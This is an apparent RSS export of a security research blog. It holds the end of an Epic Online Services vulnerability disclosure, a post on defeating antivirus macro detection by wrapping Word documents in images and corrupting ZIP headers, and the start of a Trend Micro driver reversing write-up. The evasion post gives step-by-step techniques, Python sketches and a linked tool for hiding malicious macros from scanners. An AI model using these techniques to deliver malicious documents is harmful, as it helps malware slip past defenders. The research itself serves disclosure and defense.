one of the best vendors I have ever worked with. 
Epic Games consistently responded promptly, showed a high level of respect for my time, and was willing to extensively discuss the vulnerability. I can confidently say that the security team there is very competent and that I have no doubt of their skill. When it comes to actually &quot;getting things done&quot; and fixing these vulnerabilities, however, the response was questionable.</p><p>To my knowledge:</p><ol><li>Epic Games has partially* remediated the sensitive information disclosure vulnerability, opting to use a custom addressing format for peer-to-peer hosts instead of exposing their real IP Address in the <code>ADDRESS</code> session attribute.</li><li>Epic Games has not remediated the session hijacking issue; however, they have released a new &quot;Client Policy&quot; mechanism, including a <code>Peer2Peer</code> policy intended for &quot;untrusted client applications that want to host multiplayer matches&quot;. In practice, the only impact on the vulnerability is that there is an extra layer of authentication to perform it, requiring that the attacker be a user of the game (in contrast to only having client credentials). Epic Games has noted that they plan to &quot;release additional tools to developers in future updates to the SDK, allowing them to further secure their products&quot;.</li></ol><p>* If a new session does not set its own <code>ADDRESS</code> attribute, the EOS-API will automatically set the host&apos;s public IP Address as the <code>ADDRESS</code> attribute.</p><p>Instead of fixing the severe design flaw, Epic Games has opted to update their documentation with several warnings about how to use EOS correctly and add trivial obstacles for an attacker (i.e., the user authentication required for session hijacking). Regardless of their warnings, the vulnerability is still in full effect. 
Here is a list of various notices Epic Games has placed in their documentation:</p><ol><li>In the documentation for the <a href="https://dev.epicgames.com/docs/services/en-US/Interfaces/Sessions/index.html">Session interface</a>, Epic Games has placed several warnings all stating that attackers can leak the IP Address of a peer-to-peer host or server.</li><li>Epic Games has created a brand new <a href="https://dev.epicgames.com/docs/services/en-US/Interfaces/Sessions/MatchmakingSecurity/index.html">Matchmaking Security</a> page, which is a sub-page of the Session interface, outlining:<ul><li>Attackers may be able to access the IP Address and product user ID of a session host.</li><li>Attackers may be able to access any custom attributes set by game developers for a session.</li><li>Some &quot;best practices&quot;, such as only exposing the information you need to expose.</li></ul></li><li>Epic Games has transitioned to a new <a href="https://dev.epicgames.com/docs/services/en-US/DevPortal/ClientCredentials/index.html">Client Policy</a> model for authentication, including policies for untrusted clients.</li></ol><h3 id="can-this-really-be-fixed">Can this really be fixed?</h3><p>I&apos;d like to give Epic Games every chance to explain these questionable remediation choices. Here is the statement they made after reviewing this article:</p><blockquote>Regarding P2P matchmaking, the issues you&#x2019;ve outlined are faced by nearly all service providers in the gaming industry - at its core P2P is inherently insecure. The EOS matchmaking implementation follows industry standard practices. It&apos;s ultimately up to developers to implement appropriate checks to best suit their product. 
As previously mentioned, we are always working to improve the security around our P2P policy and all of our other matchmaking policies.</blockquote><p>Unfortunately, I have a lot of problems with this statement:</p><ol><li>Epic Games erroneously included the IP Address of peers in the session attributes, even though this information was never required in the first place. Exposing PII unnecessarily is certainly not an industry standard. At the end of the day, an attacker can likely figure out the IP of a client if they have their product user ID and socket ID, but Epic Games made it trivial for an attacker to enumerate and map an entire game&apos;s matchmaking system by including that unnecessary info.</li><li>&quot;<em>The EOS matchmaking implementation follows industry standard practices</em>&quot;: The only access control present is a single layer of authentication...</li><li>Epic Games has yet to implement common mitigations such as rate-limiting.</li><li>There are an insane number of ways to insecurely implement Epic Online Services, and Epic Games has documented none of these cases or how to defend against them. A great example is when games like Satisfactory store sensitive information like a session ID in the session&apos;s attributes.</li><li>The claim that the Session Hijacking issue cannot be remediated because &quot;P2P is inherently insecure&quot; is simply not true. After all, the central EOS-API server itself can still be trusted. Here is what Epic could do to remediate the Session Hijacking vulnerability:</li></ol><ul><li>A key requirement of the session hijacking attack is that an attacker must create multiple duplicate sessions that match the given attributes. 
An effective remediation is to limit the number of concurrent sessions a single user can have at once.</li><li>To prevent attackers from using multiple accounts to hijack a single session, Epic Games could enforce that the product user ID stored in the session <em>must</em> match the product user ID of the token the client is authenticating with.</li><li>To be clear, if Epic Games applied my suggested path of remediation, an attacker could still buy 10-20 copies of the game on different accounts to perform the attack on a small scale. A large-scale attack would require thousands of copies to create enough fake hijacking sessions.</li><li>The point with this path of remediation is that it would <em>significantly</em> reduce the exploitability of this vulnerability, much more than a single layer of authentication provides.</li></ul><p>Epic Games has yet to comment on these suggestions.</p><h3 id="but-why">But... why?</h3><p>When I first came across the design flaw that peer-to-peer games are required to embed <code>GameServer</code> credentials, I was curious as to how such a fundamental flaw could have gotten past the initial design stage and decided to investigate.</p><p>After comparing the <a href="https://web.archive.org/web/20190709191905/https://dev.epicgames.com/en-US/services">EOS landing page from its initial release in 2019</a> to the current page, it turns out that peer-to-peer functionality was <em>not in the original release of Epic Online Services</em>, but the <code>GameClient</code> and <code>GameServer</code> authentication model was!</p><p>It appears as though Epic Games simply didn&apos;t consider adding a new role dedicated to peer-to-peer hosts when designing the peer-to-peer functionality of the EOS-API.</p><h3 id="timeline">Timeline</h3><p>The timeline for this vulnerability is the following:</p><p>07/23/2020 - The vulnerability is reported to Epic Games.<br>07/28/2020 - The vulnerability is reproduced by HackerOne&apos;s triage 
team.<br>08/11/2020 - The vulnerability is officially triaged by Epic Games.<br>08/20/2020 - A disclosure timeline of 135 days is negotiated (for release in December 2020).<br>11/08/2020 - New impact/attack scenarios that are a result of this vulnerability are shared with Epic Games.<br>12/02/2020 - The vulnerability severity is escalated to Critical.<br>12/03/2020 - This publication is shared with Epic Games for review.<br>12/17/2020 - This publication is released to the public.</p><h2 id="frequently-asked-questions">Frequently Asked Questions</h2><p><strong>Am I vulnerable?</strong><br>If your game uses Epic Online Services, specifically its peer-to-peer or session/matchmaking functionality, you are likely vulnerable to some of the issues discussed in this article.</p><p>Epic Games has not remediated several issues discussed, opting to provide warnings in documentation instead of fixing the underlying problems in their platform.</p><p><strong>What do I do if I am vulnerable?</strong><br>If you&apos;re a player of the game, reach out to the game developers.</p><p>If you&apos;re a game or library developer, reach out to Epic Games for assistance. 
Make sure to review the <a href="https://dev.epicgames.com/docs/services/en-US/Interfaces/Sessions/MatchmakingSecurity/index.html">documentation warnings</a> Epic Games has added due to this vulnerability.</p><p><strong>What is the potential impact of these vulnerabilities?</strong><br>The vulnerabilities discussed in this article could be used to:</p><ol><li>Hijack any or all &quot;matchmaking sessions&quot; and have any player that joins a session join an attacker&apos;s session instead.</li><li>Prevent players from joining any &quot;matchmaking session&quot;.</li><li>Leak the user identifier and IP Address of any player hosting a session.</li></ol>]]></content:encoded></item><item><title><![CDATA[Defeating Macro Document Static Analysis with Pictures of My Cat]]></title><description><![CDATA[<p>Over the past few weeks I&apos;ve spent some time learning <a href="https://en.wikipedia.org/wiki/Visual_Basic_for_Applications">Visual Basic for Applications</a> (VBA), specifically for creating malicious Word documents to act as an initial stager. 
When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, <em>how</em> does anti-virus detect</p>]]></description><link>https://billdemirkapi.me/defeating-macro-document-static-analysis-with-pictures-of-my-cat/</link><guid isPermaLink="false">60277187d8acfdb32a8770b0</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Wed, 16 Sep 2020 11:33:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/photo_2018-08-30_23-34-18.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/photo_2018-08-30_23-34-18.jpg" alt="Defeating Macro Document Static Analysis with Pictures of My Cat"><p>Over the past few weeks I&apos;ve spent some time learning <a href="https://en.wikipedia.org/wiki/Visual_Basic_for_Applications">Visual Basic for Applications</a> (VBA), specifically for creating malicious Word documents to act as an initial stager. When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, <em>how</em> does anti-virus detect a malicious macro?</p><p>The hypothesis I came up with was that anti-virus would parse out macro content from the word document and scan the macro code for a variety of malicious techniques, nothing crazy. 
A common pattern I&apos;ve seen attackers use to counter this sort of detection is <a href="https://github.com/sevagas/macro_pack">macro obfuscation</a>, which is effectively scrambling macro content in an attempt to evade the malicious patterns anti-virus looks for.</p><p>The questions I wanted answered were:</p><ol><li>How does anti-virus even retrieve the macro content?</li><li>How does the retrieval of macro content differ between Microsoft Word&apos;s implementation and anti-virus?</li></ol><h2 id="discovery">Discovery</h2><p>According to <a href="https://en.wikipedia.org/wiki/Office_Open_XML">Wikipedia</a>, Office Open XML (OOXML) &quot;is a <em>zipped</em>, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents&quot;. This is the file format used for the common Microsoft Word extensions <code>docx</code> and <code>docm</code>. The fact that Microsoft Office documents were essentially a zip file of XML files certainly piqued my interest.</p><p>Since the OOXML format is just a zip file, I found that parsing macro content from a Microsoft Word document was simpler than you might expect. All an anti-virus would need to do is:</p><ol><li>Extract the Microsoft Office document as a ZIP and look for the file <code>word\vbaProject.bin</code>.</li><li>Parse the OLE binary and extract the macro content.</li></ol><p>The differences I was interested in were how the methods would handle errors and corruption.
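</p><p>The two-step extraction above is easy to sketch. The following is a minimal, hypothetical example using Python&apos;s standard <code>zipfile</code> module; the builder function and sample bytes are stand-ins for a real macro document, and note that inside the archive the entry is stored with a forward slash (<code>word/vbaProject.bin</code>):</p>

```python
import io
import zipfile


def make_fake_docm(vba_bytes: bytes) -> bytes:
    """Build a stand-in OOXML document: just a zip with the expected layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/vbaProject.bin", vba_bytes)  # the OLE blob holding macros
    return buf.getvalue()


def extract_vba_project(doc_bytes: bytes):
    """Step 1: open the document as a zip and return the raw vbaProject.bin blob."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        for name in z.namelist():
            if name.lower() == "word/vbaproject.bin":
                return z.read(name)
    return None  # no macro project present


sample = make_fake_docm(b"demo-ole-bytes")
vba = extract_vba_project(sample)
```

<p>Step 2, parsing the OLE binary itself, is the more involved half; it is what dedicated macro-analysis tools implement.</p><p>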
For example, common implementations of ZIP extraction will often have error checking such as:</p><ol><li>Does the local file header begin with the signature <code>0x04034b50</code>?</li><li>Is the minimum version field greater than what is supported?</li></ol><p>What I was really after was finding ways to break the ZIP parser in anti-virus <em>without</em> breaking the ZIP parser used by Microsoft Office.</p><p>Before we get into corrupting anything, we need a base sample first. As an example, I simply wrote a basic macro that would display &quot;Hello World!&quot; when the document was opened.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/6EyHgBz.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>For the purposes of testing detection of macros, I needed another sample document that was heavily detected by anti-virus. After a quick Google search, I found a few samples shared by <a href="https://twitter.com/malware_traffic">@malware_traffic</a> <a href="https://www.malware-traffic-analysis.net/2017/05/16/index.html">here</a>.
The sample named <code>HSOTN2JI.docm</code> had the highest detection rate, coming in at <a href="https://www.virustotal.com/gui/file/4da60d4278f4996163f5ffa28196919369d4ca365245ce8c60dc46bd9d816667/detection">44/61 engines marking the document as malicious</a>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/RKMJX6X.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>To ensure that detections were specifically based on the malicious macro inside the document&apos;s <code>vbaProject.bin</code> OLE file, I...</p><ol><li>Opened both my &quot;Hello World&quot; and the <code>HSOTN2JI</code> macro documents as ZIP files.</li><li>Replaced the <code>vbaProject.bin</code> OLE file in my &quot;Hello World&quot; macro document with the <code>vbaProject.bin</code> from the malicious <code>HSOTN2JI</code> macro document.</li></ol><p>Running the scan again resulted in the <a href="https://www.virustotal.com/gui/file/aa0c0663d8e601456b6327e06f56d31a701f1047085dae3846fb1c9c81a4cd09/detection">following detection rate</a>:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/6gUQuby.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>Fortunately, these anti-virus products were detecting the actual macro and not solely relying on conventional methods such as blacklisting the hash of the document. 
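</p><p>The <code>vbaProject.bin</code> swap performed above can be scripted in a few lines. Below is a rough sketch (not the author&apos;s tooling) that rewrites an archive while substituting one member, using Python&apos;s <code>zipfile</code>; the member names and payload bytes are made up for demonstration:</p>

```python
import io
import zipfile


def replace_member(zip_bytes: bytes, name: str, new_bytes: bytes) -> bytes:
    """Rebuild the archive, copying every member but substituting `name`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as src, \
            zipfile.ZipFile(out, "w") as dst:
        for item in src.infolist():
            data = new_bytes if item.filename == name else src.read(item.filename)
            dst.writestr(item.filename, data)
    return out.getvalue()


# Build a tiny stand-in "Hello World" document...
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/document.xml", "<document/>")
    z.writestr("word/vbaProject.bin", b"benign macro project")

# ...and swap in a different macro project, mirroring the experiment above.
patched = replace_member(buf.getvalue(), "word/vbaProject.bin",
                         b"malicious macro project")
```

<p>Rewriting the archive rather than patching it in place keeps the central directory consistent.</p><p>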
Now with a base malicious sample, we can begin tampering with the document.</p><h2 id="exploitation">Exploitation</h2><p>The methodology I used for each corruption method was:</p><ol><li>Modify the original base sample file with the corruption method.</li><li>Verify that the document still opens in Microsoft Word.</li><li>Upload the new document to VirusTotal.</li><li>If the results were good, retry the method on my original &quot;Hello World&quot; macro document and verify that the macro still works.</li></ol><p>Before continuing, it&apos;s important to note that the methods discussed in this blog post do come with drawbacks, specifically:</p><ol><li>Whenever a victim opens a corrupted document, they will receive a prompt asking whether or not they&apos;d like to recover the document:<br></li></ol><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/mQ9QBRp.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><ol start="2"><li>Before the macro is executed, the victim will be prompted to save the recovered document. Once the victim has saved the recovered document, the macro will execute.</li></ol><p>Although adding any user interaction certainly increases the complexity of the attack, if a victim was going to enable macros anyway, they&apos;d probably also be willing to recover the document.</p><h3 id="general-corruption">General Corruption</h3><p>We&apos;ll first start with the effects of general corruption on a Microsoft Word document.
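</p><p>As background for why leading garbage is survivable at all, recall that ZIP readers locate the end-of-central-directory record by scanning backwards from the end of the file, so bytes prepended to an archive are simply skipped by many parsers. Python&apos;s <code>zipfile</code> behaves this way (the format was designed to accommodate self-extracting archives), which makes for a quick demonstration; the payload bytes here are placeholders:</p>

```python
import io
import zipfile

# A stand-in macro document: a zip containing a fake vbaProject.bin.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/vbaProject.bin", b"macro payload")
clean = buf.getvalue()

# Prepend junk (chosen to contain no 'PK' signatures) to the archive.
corrupted = b"\xde\xad\xbe\xef" * 64 + clean

# The file no longer *starts* with a local file header...
assert corrupted[:4] != b"PK\x03\x04"

# ...yet a parser that walks back from the end still reads the member fine.
recovered = zipfile.ZipFile(io.BytesIO(corrupted)).read("word/vbaProject.bin")
```

<p>A scanner that insists the file begin with the local file header signature would give up here, while a recovery-minded parser does not.</p><p>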
What I mean by this is that I&apos;ll be corrupting the file using methods that are not specific to the ZIP file format.</p><p>First, let&apos;s observe the impact of adding random bytes to the beginning of the file.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/dQ8lrKt.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/KG7Mlya.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>With a few bytes at the beginning of the document, we were able to decrease detection by about 33%. This made me confident that future attempts could reduce this even further.</p><p><strong>Result:</strong> 33% decrease in detection</p><h4 id="prepending-my-cat">Prepending My Cat</h4><p>This time, let&apos;s do the same thing except prepend a JPG file, in this case, a photo of my cat!</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/hWfh1Nl.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>You might think that prepending some random data should result in the same detection rate as an image, but some anti-virus engines marked the file as clean as soon as they saw an image.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/J911XpJ.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>To aid in future research, the anti-virus engines that marked the random data document as malicious but did <em>not</em> mark the cat document as malicious were:</p><pre><code>Ad-Aware
ALYac
DrWeb
eScan
McAfee
Microsoft
Panda
Qihoo-360
Sophos ML
Tencent
VBA32
</code></pre><p>The reason this list is larger than the actual difference in detection is that some engines strangely detected this cat document, but did <em>not</em> detect the random data document.</p><p><strong>Result:</strong> 50% decrease in detection</p><h4 id="prepending-appending-my-cat">Prepending + Appending My Cat</h4><p>Purely appending data to the end of a macro document barely impacts the detection rate; instead, we&apos;ll be combining appending data with other methods, starting with my cat.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/7qjlH93.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>What was shocking about all of this was that even when the ZIP file was in the middle of two images, Microsoft&apos;s parser was able to reliably recover the document and macro! With only extremely basic modifications to the document, we were able to essentially prevent most detection of the macro.</p><p><strong>Result:</strong> 88% decrease in detection</p><h3 id="zip-corruption">Zip Corruption</h3><p>Microsoft&apos;s fantastic document recovery is not limited to general methods of file corruption. Let&apos;s take a look at how it handles corruption specific to the ZIP file format.</p><h4 id="corrupting-the-zip-local-file-header">Corrupting the ZIP Local File Header</h4><p>The only file we care about preventing access to is the <code>vbaProject.bin</code> file, which contains the malicious macro.
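</p><p>To preview how a strict parser reacts when only that member&apos;s local file header is damaged, here is a sketch using Python&apos;s <code>zipfile</code>, which validates the header magic when a member is opened; the archive and payload are stand-ins for a real macro document:</p>

```python
import io
import zipfile

# Stand-in macro document.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/document.xml", "<document/>")
    z.writestr("word/vbaProject.bin", b"macro payload")
data = bytearray(buf.getvalue())

# Locate the member's local file header via the (untouched) central directory.
with zipfile.ZipFile(io.BytesIO(bytes(data))) as z:
    offset = z.getinfo("word/vbaProject.bin").header_offset
assert data[offset:offset + 4] == b"PK\x03\x04"

# Corrupt only the 4-byte signature; the macro bytes themselves stay intact.
data[offset:offset + 4] = b"\x00\x00\x00\x00"

# A parser that verifies the magic now refuses the member outright.
try:
    zipfile.ZipFile(io.BytesIO(bytes(data))).read("word/vbaProject.bin")
    strict_parser_failed = False
except zipfile.BadZipFile:
    strict_parser_failed = True
```

<p>Other members remain readable, so for strict parsers only access to the macro project is lost.</p><p>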
Without corrupting the data, could we corrupt the file header for the <code>vbaProject.bin</code> file and still have Microsoft Word recognize the macro document?</p><p>Let&apos;s take a look at the structure of a local file header from <a href="https://en.wikipedia.org/wiki/Zip_(file_format)">Wikipedia</a>:<br></p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/aZqIjWO.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>I decided that the local file header signature would be the field least likely to break file parsing if corrupted, hoping that Microsoft Word didn&apos;t care whether or not the file header had the correct magic value. If Microsoft Word didn&apos;t care about the magic, corrupting it had a high chance of interfering with ZIP parsers that have integrity checks such as verifying the value of the magic.</p><p>After corrupting only the file header signature of the <code>vbaProject.bin</code> file entry, we get the following result:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/2F5Zhry.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/ucMpYUK.png" class="kg-image" alt="Defeating Macro Document Static Analysis with Pictures of My Cat" loading="lazy"></figure><p>With a ZIP-specific corruption method, we almost completely eliminated detection.</p><p><strong>Result:</strong> 90% decrease in detection</p><h2 id="combining-methods">Combining Methods</h2><p>With all of these methods, we&apos;ve been able to reduce static detection of malicious macro documents quite a bit, but it&apos;s still not 100%. Could these methods be combined to achieve even lower rates of detection? Fortunately, yes!</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th><strong>Method</strong></th>
<th><strong>Detection Rate Decrease</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Prepending Random Bytes</td>
<td>33%</td>
</tr>
<tr>
<td>Prepending an Image</td>
<td>50%</td>
</tr>
<tr>
<td>Prepending and Appending an Image</td>
<td>88%</td>
</tr>
<tr>
<td>Corrupting ZIP File Header</td>
<td>90%</td>
</tr>
<tr>
<td>Prepending/Appending Image <em>and</em> Corrupting ZIP File Header</td>
<td>100%</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>Interested in trying out the last corruption method that reduced detection by 100%? <a href="https://gist.github.com/D4stiny/3429852f2fe8b7f7725e7f5cc18cafbd">I made a script to do just that</a>! To use it, simply execute the script, providing the document filename as the first argument and a picture filename as the second. The script will spit out the patched document to your current directory.</p><p>As stated before, even though these methods can bring down the detection of a macro document to 0%, they come at a high cost to attack complexity. A victim will not only need to click to recover the document, but will also need to save the recovered document before the malicious macro executes. Whether or not that added complexity is worth it for your team will largely depend on the environment you&apos;re against.</p><p>Regardless, one must heavily applaud the team working on Microsoft Office, especially those who designed the fantastic document recovery functionality. Even when compared to tools that are specifically designed to recover ZIP files, the recovery capability in Microsoft Office exceeds all expectations.</p>]]></content:encoded></item><item><title><![CDATA[How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit]]></title><description><![CDATA[<p><em>The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer.
All research was conducted independently.</em></p><p>For a recent project, I had to do research into methods rootkits are detected and the most effective measures to catch them when</p>]]></description><link>https://billdemirkapi.me/how-to-use-trend-micro-rootkit-remover-to-install-a-rootkit/</link><guid isPermaLink="false">60277148d8acfdb32a8770a5</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Mon, 18 May 2020 15:32:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/N7lMUBZ.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/N7lMUBZ.png" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit"><p><em>The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.</em></p><p>For a recent project, I had to do research into the methods by which rootkits are detected and the most effective measures to catch them, which led me to ask the question: what are some existing solutions to rootkits, and how do they function? My search eventually landed me on the <a href="https://www.trendmicro.com/en_us/forHome/products/free-tools/rootkitbuster.html">TrendMicro RootkitBuster</a>, which describes itself as &quot;A free tool that scans hidden files, registry entries, processes, drivers, and the master boot record (MBR) to identify and remove rootkits&quot;.</p><p>The features it boasted certainly caught my attention. They were claiming to detect several techniques rootkits use to burrow themselves into a machine, but how does it work under the hood and can we abuse it?
I decided to find out by reverse engineering core components of the application itself, leading me down a rabbit hole of code that scarred me permanently, to say the least.</p><h2 id="discovery">Discovery</h2><p>Starting the adventure, launching the application resulted in a fancy warning by <a href="https://processhacker.sourceforge.io/">Process Hacker</a> that a new driver had been installed.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/h9D410y.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Already off to a good start, we got a copy of Trend Micro&apos;s &quot;common driver&quot;, this was definitely something to look into. Besides this driver being installed, this friendly window opened prompting me to accept Trend Micro&apos;s user agreement.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/N7lMUBZ.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>I wasn&apos;t in the mood to sign away my soul to the devil just yet, especially since the terms included a clause stating <em>&quot;You agree not to attempt to reverse engineer, decompile, modify, translate, disassemble, discover the source code of, or create derivative works from...&quot;</em>.</p><p>Thankfully, Trend Micro already deployed their software on to my machine before I accepted any terms. Funnily enough, when I tried to exit the process by right-clicking on the application and pressing &quot;Close Window&quot;, it completely evaded the license agreement and went to the main screen of the scanner, even though I had selected the &quot;I do not accept the terms of the license agreement&quot; option. 
Thanks Trend Micro!</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/dUiNDqe.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>I noticed a quick command prompt flash when I started the application. It turns out this was the result of a 7-Zip self-extracting binary, which extracted the rest of the application components to <code>%TEMP%\RootkitBuster</code>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/I8XOQ1j.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Let&apos;s review the driver we&apos;ll be covering in this article.</p><ul><li>The <code>tmcomm</code> driver, which was labeled as the &quot;TrendMicro Common Module&quot; and &quot;Trend Micro Eyes&quot;. A quick look over the driver indicated that it accepted communication from <em>privileged</em> user-mode applications and performed common actions that are not specific to the Rootkit Remover itself. This driver is <em>not</em> used only in the Rootkit Buster and is implemented throughout Trend Micro&apos;s product line.</li></ul><p>In the following sections, we&apos;ll be deep diving into the <code>tmcomm</code> driver. We&apos;ll focus our research on finding different ways to abuse the driver&apos;s functionality, with the end goal of being able to execute kernel code. I decided not to look into <code>tmrkb.sys</code> because although I am sure it is vulnerable, it seems to only be used for the Rootkit Buster.</p><h2 id="trendmicro-common-module-tmcomm-sys-">TrendMicro Common Module (tmcomm.sys)</h2><p>Let&apos;s begin our adventure with the base driver that appears to be used not only for this Rootkit Remover utility, but several other Trend Micro products as well.
As I stated in the previous section, a very brief look over the driver revealed that it does allow for communication from <em>privileged</em> user-mode applications.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/TtipViE.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>One of the first actions the driver takes is to create a device to accept IOCTL communication from user-mode. The driver creates a device at the path <code>\Device\TmComm</code> and a symbolic link to the device at <code>\DosDevices\TmComm</code> (accessible via <code>\\.\Global\TmComm</code>). The driver entrypoint initializes a significant number of classes and structures used throughout the driver; however, for our purposes, it is not necessary to cover each one.</p><p>I was happy to see that Trend Micro made the correct decision of restricting their device to the <code>SYSTEM</code> user and Administrators. This meant that even if we did find exploitable code, because any communication would require at least Administrative privileges, much of the industry would not consider it a vulnerability. For example, <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">Microsoft themselves</a> do not consider Administrator to Kernel to be a security boundary because of the significant amount of access Administrators already have. This does not mean, however, that exploitable code in Trend Micro&apos;s drivers won&apos;t be useful.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/9sS6Z2w.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><h2 id="trueapi">TrueApi</h2><p>A large component of the driver is its &quot;TrueApi&quot; class, which is instantiated during the driver&apos;s entrypoint. The class contains pointers to <em>imported</em> functions that get used throughout the driver.
Here is a reversed structure:</p><pre><code class="language-c">struct TrueApi
{
	BYTE Initialized;
	PVOID ZwQuerySystemInformation;
	PVOID ZwCreateFile;
	PVOID unk1; // Initialized as NULL.
	PVOID ZwQueryDirectoryFile;
	PVOID ZwClose;
	PVOID ZwOpenDirectoryObjectWrapper;
	PVOID ZwQueryDirectoryObject;
	PVOID ZwDuplicateObject;
	PVOID unk2; // Initialized as NULL.
	PVOID ZwOpenKey;
	PVOID ZwEnumerateKey;
	PVOID ZwEnumerateValueKey;
	PVOID ZwCreateKey;
	PVOID ZwQueryValueKey;
	PVOID ZwQueryKey;
	PVOID ZwDeleteKey;
	PVOID ZwTerminateProcess;
	PVOID ZwOpenProcess;
	PVOID ZwSetValueKey;
	PVOID ZwDeleteValueKey;
	PVOID ZwCreateSection;
	PVOID ZwQueryInformationFile;
	PVOID ZwSetInformationFile;
	PVOID ZwMapViewOfSection;
	PVOID ZwUnmapViewOfSection;
	PVOID ZwReadFile;
	PVOID ZwWriteFile;
	PVOID ZwQuerySecurityObject;
	PVOID unk3; // Initialized as NULL.
	PVOID unk4; // Initialized as NULL.
	PVOID ZwSetSecurityObject;
};
</code></pre><p>Looking at the code, the TrueApi is primarily used as an alternative to calling the functions directly. My educated guess is that Trend Micro is caching these imported functions at initialization to evade <em>delayed</em> IAT hooks. Since the TrueApi is resolved by looking at the import table, however, if there is a rootkit that hooks the IAT on driver load, this mechanism is useless.</p><h2 id="xrayapi">XrayApi</h2><p>Similar to the TrueApi, the XrayApi is another major class in the driver. This class is used to access several low-level devices and to interact directly with the filesystem. A major component of the XrayApi is its &quot;config&quot;. Here is a partially reverse-engineered structure representing the config data:</p><pre><code class="language-c">struct XrayConfigData
{
	WORD Size;
	CHAR pad1[2];
	DWORD SystemBuildNumber;
	DWORD UnkOffset1;
	DWORD UnkOffset2;
	DWORD UnkOffset3;
	CHAR pad2[4];
	PVOID NotificationEntryIdentifier;
	PVOID NtoskrnlBase;
	PVOID IopRootDeviceNode;
	PVOID PpDevNodeLockTree;
	PVOID ExInitializeNPagedLookasideListInternal;
	PVOID ExDeleteNPagedLookasideList;
	CHAR unkpad3[16];
	PVOID KeAcquireInStackQueuedSpinLockAtDpcLevel;
	PVOID KeReleaseInStackQueuedSpinLockFromDpcLevel;
	...
};
